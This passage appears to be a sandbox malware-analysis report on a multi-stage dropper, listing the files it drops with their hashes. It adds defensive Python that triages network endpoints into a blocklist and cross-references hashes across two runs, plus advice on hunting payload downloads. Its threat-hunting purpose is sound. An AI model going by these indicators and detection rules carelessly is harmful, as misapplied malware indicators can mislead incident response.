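    for line in text.splitlines():
        if not line.strip():
            continue
        row = parse_row(line)
        key = (row["ip"], row["port"], row["proto"], row["domain"])
        if key in seen:
            continue
        seen.add(key)
        buckets.setdefault(classify(row), []).append(f"{row['ip']}:{row['port']}/{row['proto']}")
    return buckets


def blocklist(text):
    """Direct-IP endpoints plus unresolved endpoints off port 443: safe to block outright.
    Unresolved :443 rows are left for review, since bare-IP TLS can be OS or CDN traffic."""
    b = triage(text)
    cand = set(b.get("direct-ip", []))
    cand.update(e for e in b.get("unresolved", []) if not e.endswith(":443/tcp"))
    return sorted(cand)


if __name__ == "__main__":
    for bucket, endpoints in triage(NETWORK_ROWS).items():
        print(f"{bucket:20s} {', '.join(endpoints)}")
    print("block:", blocklist(NETWORK_ROWS))
```

Blocking github.com or bitbucket.org is not an option on most networks, so those rows are better turned into proxy-log hunts for downloads from bbuseruploads.s3.amazonaws.com and objects.githubusercontent.com by processes under %TEMP%; the bare-IP rows are what go into a firewall or IDS list.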

Files

memory/456-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3492-1-0x0000000002650000-0x0000000002666000-memory.dmp

memory/456-2-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A539.exe

MD5 9a747219c8fab73e2ba0541e3d86cd8b
SHA1 0723a7c85108ebd6a8141a7ce2459c35add81a0c
SHA256 eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01
SHA512 acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83

memory/700-12-0x0000000001430000-0x0000000001482000-memory.dmp

memory/700-17-0x0000000074410000-0x0000000074BC0000-memory.dmp

memory/700-18-0x00000000060D0000-0x0000000006674000-memory.dmp

memory/700-19-0x0000000005B20000-0x0000000005BB2000-memory.dmp

memory/700-20-0x0000000005DB0000-0x0000000005DC0000-memory.dmp

memory/700-21-0x0000000005BC0000-0x0000000005BCA000-memory.dmp

memory/700-23-0x0000000007130000-0x0000000007748000-memory.dmp

memory/700-24-0x00000000089B0000-0x0000000008ABA000-memory.dmp

memory/700-25-0x0000000007000000-0x0000000007012000-memory.dmp

memory/700-26-0x0000000007060000-0x000000000709C000-memory.dmp

memory/700-27-0x00000000070B0000-0x00000000070FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B15F.exe

MD5 e6eb3adc80afeb9fe6fcdcd0bcea7b8c
SHA1 cca2f9898a1eb7bbbc7a7fc5c2bfa9205e0c49d4
SHA256 3dae2ea5842c058cda1df0525924b1d29c2b1239074e4a9855d985c48a74cd8c
SHA512 44575b05ed551c9ef9962ae60b496ba85d25452ccf187cda15a13823b5dfa5ac87e559aa13efd276b0ce2dd9a77369a6c9ad53eb56d0700a86607169d862a9a9

C:\Users\Admin\AppData\Local\Temp\B15F.exe

MD5 ee9c445c99d7fa495e63fd30b8859038
SHA1 79fcd4771be0b2e12a5859b161142f784bb9c8f1
SHA256 43a4339cdc20c64ae43a1a98085b526e5aaf0437253b286ff036f24c2da9100b
SHA512 b09de3b15ae3606d3e962135ad4c3e9902d0f1a62d30e5a3220f3fa48935b12b8c27d306a21c34b1be0ae05b15ce688f4b583d65c47c388bfef14f4e8ac6723a

memory/2208-33-0x0000000000960000-0x0000000000DFE000-memory.dmp

memory/2208-34-0x0000000005920000-0x00000000059BC000-memory.dmp

memory/2208-35-0x00000000059F0000-0x0000000005A00000-memory.dmp

memory/2208-32-0x0000000074410000-0x0000000074BC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BDA5.exe

MD5 5d3f41a2bc742603daf1d51270f3c80b
SHA1 252bb1132b20c5db7df0b979ae80f8c4125768ea
SHA256 0f198f58a52c60028c1e8b5287208da608fa1ceb7f151386cd4a82c4704eb18c
SHA512 f05404da6e65c7a34e6ddad42278e44cf815b3a912b34f9098f97883567570fa8df7f939e76585b545a10900b654ffeb398b30cd309e28ed25039e003189b5ea

C:\Users\Admin\AppData\Local\Temp\BDA5.exe

MD5 748c2ecf1e94e3b30fd141c384c467e7
SHA1 b8ae5990fa804d08cdf1227b99e1b39762d28ceb
SHA256 6e927e23597b8e0e61e4582f0b28c6df0fad0797f8c62b37628063188b516149
SHA512 16bad9b21112d47adaeae910c25302872b37e3af9d20014b6042afd40d26e6fd275a726160d28807c324514bbf93f0d3244a55f8ad17ae4acc33adcca45fdf88

memory/1556-40-0x0000000074410000-0x0000000074BC0000-memory.dmp

memory/1556-41-0x0000000000450000-0x0000000001242000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 576a55829236f95e8d8953ad84441001
SHA1 0bf03738d7bcb400e75155bbe0fda1d59ff82065
SHA256 6e0b12ad23efc9133afa8df283266aa29311a2f968ae375078ba56fb6337dd09
SHA512 9bfa392211b368d36009d7a9cb6d7c0450ee9530ba548667d8d28e8c0cfbdccaa4c4ff19fa1bacd8097bb41eb3adc892d746df2e1b48453beb1092f5b5854bf1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 fbdf8fe1acc9cadc4d1a92296b52392a
SHA1 ad4879b2e4f88f6a93c780cc7e0e73623afdbc71
SHA256 c72e2b5daf376341bf49e28bd98269feb5bd8a4e56d97efb9f74eb85716246a6
SHA512 65d006dec391a65b37f403829f369658521812b2ed0010b746f74c732af58e1cc26b37de83d578a07e162ef10db52bcb66b8c7ba918f3a4cf03d74c4bdcbd14a

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 ca6927f95d88717d7d92abe402d79181
SHA1 284dbdb69c0250a19b220cb0720e779557d4fc5a
SHA256 4f492fde9ebee2d8ceafec27e6e31961d3dfadf1e1aa405cbcf7a48568108be1
SHA512 154c45436d73d66c5bc3a32cc68005b2e1054c6337c57e17c9a38efeb1dd3d9955326e317ade2aeacf72221b73d637fdcc7e5e04824c1b9f85334833c98df871

C:\Users\Admin\AppData\Local\Temp\nscBFA7.tmp\Math.dll

MD5 ebd8a7a5042ae1d4ce1aa9071859c851
SHA1 ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6
SHA256 fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837
SHA512 daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e

C:\Users\Admin\AppData\Local\Temp\nscBFA7.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 88dc309a54a25943566637000ee86f19
SHA1 f6e566fc77d3f283b967d71cc03e10d324bb4e4e
SHA256 75262d791327f4ba45121accbe7fdcbe98bf13cd0346299665e359391f1e99f5
SHA512 ba3601155be83716c4f2616bce8443971cc79658134c5da2031a0d28cb47738bd7289caaa6551cd4b11369c130e7faed9b07ce8e9cfb258539dbf14e91705bd9

memory/700-80-0x00000000095C0000-0x0000000009626000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 bf3b3486886a3433f3692449d4e08481
SHA1 788b65f815f30ec9c03f9c0f6061edc753ce480c
SHA256 8e86e80e843958fead5ab2bd92506a5e863d5f09aadebad842318d55abc767be
SHA512 41ca3085262f1e9ed64002d5c44a259d0a45e59ae09c074799a802d4af0afa3231d7c99c6054fdd105b3f82b3e0bc30435003a3213a648c6bdb745e40d88a17e

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 9a0867719dddd900d9124689ef19638a
SHA1 7fab4ee91ce5328b6fc9d63360d70d52243e58ec
SHA256 3f555a9806eb08ba8577213783191259a5e00203821082b94bedd01af3e945d6
SHA512 a05cf2a4df9c766a2dc4ad36ce678c60b75542de218c68614c9adce6f9cd558afef14875584e5ef1818b33c13bfb96afd5be47da8cf935c01e189204220564df

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 6c98e8217dc1d1a8758583e665a09f02
SHA1 0db9c1e67495c94b425464f3a2371efd1dc62c5d
SHA256 8209ebad1a2b63f8bf9ed4be680b7db4de7f22f621e2ce6901e57c64ceea2332
SHA512 84acc0db85dc3884be125089561ff71804f9b59863e65315268e645f5fe2eb5aa8e7a37682331cc65c6cd9f670e913aa1d4902f96c385c896f2fb51fe7fe5404

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 cd9a84a2c669c87889792bd513790fd5
SHA1 bb0941c31dbb2c2e1b8069ac4a032a9f4d78beea
SHA256 d825f50b8b8550a7bbe80b5ffdbe79f60484c5fd7c55e36dcbadc953ab383176
SHA512 0bb7840ded4cd91db34062943615a85b7f3d9025dac186fb4b013550f7234c6287790430c0602327319136592d2e1d2227136025713298c4d951274e3852f62d

memory/556-89-0x0000000002730000-0x0000000002731000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 5b83a2023aeea9f6cd24a9d760edefdd
SHA1 52afcba93c89ab7624a269e5bf9cd0321ec8d884
SHA256 174d73c7f104874149adfe5a40199720c29baf3ae6d3756ea336bbd1017f0ba0
SHA512 bc8732d557c1f7a52ed0e77c8b4db4a04da05e2ed4daceaf815b5bfad38118664c050da2cb49f00c2e46bcd7eabc6137a08f06d6771596c2659db847b46ccf9c

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 c3c311f0e3ed22f79e8bcbf22b314409
SHA1 e20fd80c8f08f4d57310de79ee6595c9c4b5b29b
SHA256 fa9588676505dad9e72d1ea77b1a4bcc90db78552b9f35da28c2244aeafd3205
SHA512 6d4c5c460ccefe1bf9bf8936fdf80506be529b6b4c1fcdf1917766979d01126594d755851c84ef9f26597b453e921e9c2a670921a852acaccb6510ce715734ee

memory/4432-93-0x0000000000400000-0x0000000000418000-memory.dmp

memory/4664-97-0x00000000009C0000-0x00000000009C9000-memory.dmp

memory/4432-99-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 bd7eec108d9f172cee6ef85a6e2abd71
SHA1 e807c9019d0e7403a903ecdd1b421b07010d9970
SHA256 10df4bc4e31d84c88df512e7cd6105d820282009f6441e22f7fcc2d9ac3fca6d
SHA512 bbdfa7f1cb0258a07315aeaf7844fa4bda51647a8f1403902ffbc17030231141f390d49eff7f4977e60334bc23ba414d8cfb8072afe1f6f301d8799b4b6e5a1b

memory/1472-104-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C288.exe

MD5 882a73f085b3318e2b79d2d592288217
SHA1 2be3ce2c8b9b998a158036819f19d1d9c58e3efa
SHA256 2e1499f1e1c2ce9911badf0f812722f6acb956ed9ec71a6c7c3ed333ad7b9268
SHA512 ccfa28b2507e60907c57e3ec2ccf30e7c040a5de85d8fc4252c1af6d9a6aefd40a719491930bf1c98fb5f5add57d64c84d38671246e5a3c102bbd8b03162eb95

C:\Users\Admin\AppData\Local\Temp\is-6NLTA.tmp\tuc3.tmp

MD5 8b8c7fd626147211bc1af1926b324868
SHA1 b71a215be58f416c48c3d055655e1707b875cc6a
SHA256 309e92e6be4d2187e59942b5c3ed54e6c6d990d44dcb5c6676266ac670f6ade6
SHA512 48c44e39733add5550c56e5c2ffe9a8dc8f7f5f5e204437d06d77b3c4285b52dbacab337f74d8446c35fbd79747b5b87d608dc5b42715c170f73e5c17373bf5d

C:\Users\Admin\AppData\Local\Temp\is-6NLTA.tmp\tuc3.tmp

MD5 2dafe2964441df0453066b893f1d70d1
SHA1 7096f9ad2d9f982e84c07d845db3e35b188af694
SHA256 e951527c13abc00a5c7dd767ba5f7ce3575d4cba1930c4e63a8bd0dfd145ea76
SHA512 52eca4e823a1c959bc64fcedb9bc4655da784c53fc76f1ec8ab7a67afe3bc7fbb60d1a69fd7ced6c4c0ab9d01e799618c637fccd33107c9fba44920e38d7b5ab

memory/3324-109-0x00000000028C0000-0x0000000002CBB000-memory.dmp

memory/700-112-0x0000000074410000-0x0000000074BC0000-memory.dmp

memory/1472-100-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3464-129-0x0000000000620000-0x0000000000621000-memory.dmp

memory/700-130-0x0000000005DB0000-0x0000000005DC0000-memory.dmp

memory/3324-128-0x0000000002DC0000-0x00000000036AB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat

MD5 60c9624e093baac4bef11ab4fc846111
SHA1 07a25911c81e04608a0dc6fb065524a9da82dd65
SHA256 e60ede01e4c366eca01c0d420190370cb52fb239d508593b343912735ef51d1d
SHA512 14e031235f82bb93ba8044c2d39673094707814e67485d819eccad5d1aae972bfba6a12d7bb27d9f70e38a94c3f5152a3d49a799ca9501a64afb420bb280ff24

memory/3324-140-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SLUIS.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\Temp\is-SLUIS.tmp\_isetup\_isdecmp.dll

MD5 3adaa386b671c2df3bae5b39dc093008
SHA1 067cf95fbdb922d81db58432c46930f86d23dded
SHA256 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38
SHA512 bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303

memory/1556-95-0x0000000074410000-0x0000000074BC0000-memory.dmp

memory/2208-141-0x0000000074410000-0x0000000074BC0000-memory.dmp

memory/4664-94-0x0000000000B70000-0x0000000000C70000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 62b01ec4a955eab3a7a41e2c07f18913
SHA1 48d8e1e391fa078d78e2130481f9d35eb45a11ec
SHA256 c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56
SHA512 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56

memory/536-179-0x000001E64E520000-0x000001E64E530000-memory.dmp

memory/536-171-0x00007FFAED6C0000-0x00007FFAEE181000-memory.dmp

memory/536-200-0x000001E64E520000-0x000001E64E530000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nscBFA7.tmp\INetC.dll

MD5 16e4e0e875ab2b7530cb1ccc075b9528
SHA1 b3b10ee2c502ddc403573288c5d5a7a25b104023
SHA256 d6fe0f8a43dcc980a4b7f989340107464dc298ddaf3f58ea2b59c9eb687d248b
SHA512 3e7deaa48c6d567d0e2fff8c171db867d86036a6ff419529c3c74f8f423f87c74be71d07c95f1a708b9082394a3f899328cc755e430458750967e2fda18d3916

memory/536-221-0x000001E64E4D0000-0x000001E64E4F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gqmfx1yg.kvw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 5189fae36240984d59a259cfa84278bf
SHA1 4aded8edacd864e74ec7fea09e11f50a29907bda
SHA256 8fa7a17928759ff5a8cf5a315c6f3ab2af8fd1edd9e1a36cb0e1598f6b2c7a35
SHA512 ba4dd9e7a00f2e359496a47a7e83e68f82de6bd25292ccecc9206ad8a5f5bad70f4435f06576c2431eadf9e08986fefb9c104bee6494146ff1c4703e3d434869

memory/2208-292-0x00000000059F0000-0x0000000005A00000-memory.dmp

C:\Program Files (x86)\StdButton\stdbutton.exe

MD5 75c7685eafd866e5c01e2c21bf8d7bd4
SHA1 aad5da1bdb0db32d9c6a0c0934e142d6f3fb6431
SHA256 3eb022d5c1cbd257a95331cf6cdf37ec936bda77195b73c86d55529b962f8eab
SHA512 fcdbdaee1ff5379888e7b190e78b56b392b8be58fbfc1839cb6e112b7cdc9e7304051b2e5cc7d96ec7b20109597b733cf2cb3301c34d7215338ae08d187280ed

memory/2960-295-0x0000000000400000-0x0000000000695000-memory.dmp

memory/2960-296-0x0000000000400000-0x0000000000695000-memory.dmp

C:\Program Files (x86)\StdButton\stdbutton.exe

MD5 46b6c5bbc4c89bf262db15b9bac3fc56
SHA1 91b0ba2e547eeb3c7407c89465e60fbc02d4fc82
SHA256 7ba3b888f0216f73716229d2b34392666b365df3b4bea1a6efa4ad71f031d641
SHA512 c57ace8a044b67ed7c046134595d257e4638ce726bb14599f6830b2efefa1cb0b7121846ac70ccfe347662b5f59b7eed70c0c5aa7d1533f3a4b425d6c13dc698

memory/1580-302-0x0000000000400000-0x0000000000695000-memory.dmp
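The Files sections of the two runs repay a cross-reference: the same SHA256 appears under different random names (6D44.exe in behavioral1, A539.exe in behavioral2), several paths such as toolspub2.exe are listed with three or four different hashes within one run, and the ns*.tmp and is-*.tmp\_isetup entries are NSIS and Inno Setup helper DLLs rather than payload. The following is an added example, not part of the original report, that performs that cross-reference on a constructed subset of the entries above (run, path, MD5, SHA256, kept in page order). Treating the last hash listed for a path within a run as the version left on disk is an assumption of the example; so is the packager-component pattern.

```python
"""Cross-reference the Files entries of both detonations by hash and by path.

Added example, not part of the original report. FILE_ENTRIES is a constructed
subset of the behavioral1/behavioral2 Files sections (run, path, MD5, SHA256)
in page order; the full page lists more entries. Taking the last hash listed
for a path within a run as the on-disk version is an assumption.
"""
import hashlib
import re
from collections import defaultdict

T = r"C:\Users\Admin\AppData\Local\Temp"
FILE_ENTRIES = [
    ("behavioral1", T + r"\6D44.exe", "9a747219c8fab73e2ba0541e3d86cd8b",
     "eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01"),
    ("behavioral1", T + r"\8161.exe", "93fbe8d58f4b01f59ca937652e31eaf2",
     "36dcb91a2e2d215b994d8c186bc9b700256f89dbeb8755174c7d9c9783a72375"),
    ("behavioral1", T + r"\8161.exe", "444e16aca6430bd81d9b2a8c5ec03d3a",
     "5da975f37bedf34090ed8c9af159b28f4d558528c230125f323ee8d330198d2c"),
    ("behavioral1", T + r"\toolspub2.exe", "069ac54873a7f27472c62e1b734446e8",
     "124db1665fb3498b6625a9a76cf82ebd68a9fdfd5ea09d14abb8c80cc1d74469"),
    ("behavioral1", T + r"\nsy8289.tmp\Math.dll", "ebd8a7a5042ae1d4ce1aa9071859c851",
     "fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837"),
    ("behavioral1", T + r"\toolspub2.exe", "62b01ec4a955eab3a7a41e2c07f18913",
     "c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56"),
    ("behavioral1", T + r"\nsy8289.tmp\INetC.dll", "40d7eca32b2f4d29db98715dd45bfac5",
     "85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9"),
    ("behavioral2", T + r"\A539.exe", "9a747219c8fab73e2ba0541e3d86cd8b",
     "eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01"),
    ("behavioral2", T + r"\toolspub2.exe", "fbdf8fe1acc9cadc4d1a92296b52392a",
     "c72e2b5daf376341bf49e28bd98269feb5bd8a4e56d97efb9f74eb85716246a6"),
    ("behavioral2", T + r"\nscBFA7.tmp\Math.dll", "ebd8a7a5042ae1d4ce1aa9071859c851",
     "fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837"),
    ("behavioral2", T + r"\nscBFA7.tmp\INetC.dll", "40d7eca32b2f4d29db98715dd45bfac5",
     "85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9"),
    ("behavioral2", T + r"\toolspub2.exe", "bd7eec108d9f172cee6ef85a6e2abd71",
     "10df4bc4e31d84c88df512e7cd6105d820282009f6441e22f7fcc2d9ac3fca6d"),
    ("behavioral2", T + r"\toolspub2.exe", "62b01ec4a955eab3a7a41e2c07f18913",
     "c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56"),
    ("behavioral2", T + r"\nscBFA7.tmp\INetC.dll", "16e4e0e875ab2b7530cb1ccc075b9528",
     "d6fe0f8a43dcc980a4b7f989340107464dc298ddaf3f58ea2b59c9eb687d248b"),
]

# NSIS plugin dirs (ns????.tmp) and Inno Setup helpers (is-?????.tmp\_isetup) are
# installer-framework artifacts; the pattern is an assumption of this example.
PACKAGER_RE = re.compile(r"\\ns[a-z0-9]{4,6}\.tmp\\|\\is-[a-z0-9]+\.tmp\\_isetup\\", re.IGNORECASE)


def is_packager_component(path: str) -> bool:
    return PACKAGER_RE.search(path) is not None


def by_hash(entries):
    """sha256 -> set of (run, path) that carried it."""
    m = defaultdict(set)
    for run, path, _md5, sha256 in entries:
        m[sha256].add((run, path))
    return m


def cross_run_hashes(entries):
    """Hashes seen in more than one detonation: stable across runs."""
    return sorted(h for h, where in by_hash(entries).items() if len({r for r, _ in where}) > 1)


def hunt_hashes(entries):
    """Cross-run hashes that are not just installer-framework DLLs."""
    index = by_hash(entries)
    return [h for h in cross_run_hashes(entries)
            if any(not is_packager_component(p) for _, p in index[h])]


def multi_version_paths(entries):
    """path -> number of distinct SHA256 values recorded for it (>1: rewritten or differs per run)."""
    m = defaultdict(set)
    for _run, path, _md5, sha256 in entries:
        m[path].add(sha256)
    return {p: len(s) for p, s in m.items()}


def final_hash(entries, run, path):
    """Last SHA256 listed for (run, path); None if the path never appears in that run."""
    last = None
    for r, p, _md5, sha256 in entries:
        if r == run and p == path:
            last = sha256
    return last


def sha256_of_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_file(path, expected_sha256, chunk=1 << 20):
    """Streamed hash compare for a suspect file on a host under investigation."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest() == expected_sha256.lower()


if __name__ == "__main__":
    print("hunt:", hunt_hashes(FILE_ENTRIES))
    print("rewritten:", {p: n for p, n in multi_version_paths(FILE_ENTRIES).items() if n > 1})
```

On the subset above, hunt_hashes keeps only the shared second stage (6D44.exe/A539.exe) and the final toolspub2.exe, which both runs end on with the same hash; the Math.dll and INetC.dll hashes match across runs too, but they identify the NSIS packager, not the payload, so they stay out of the blocklist.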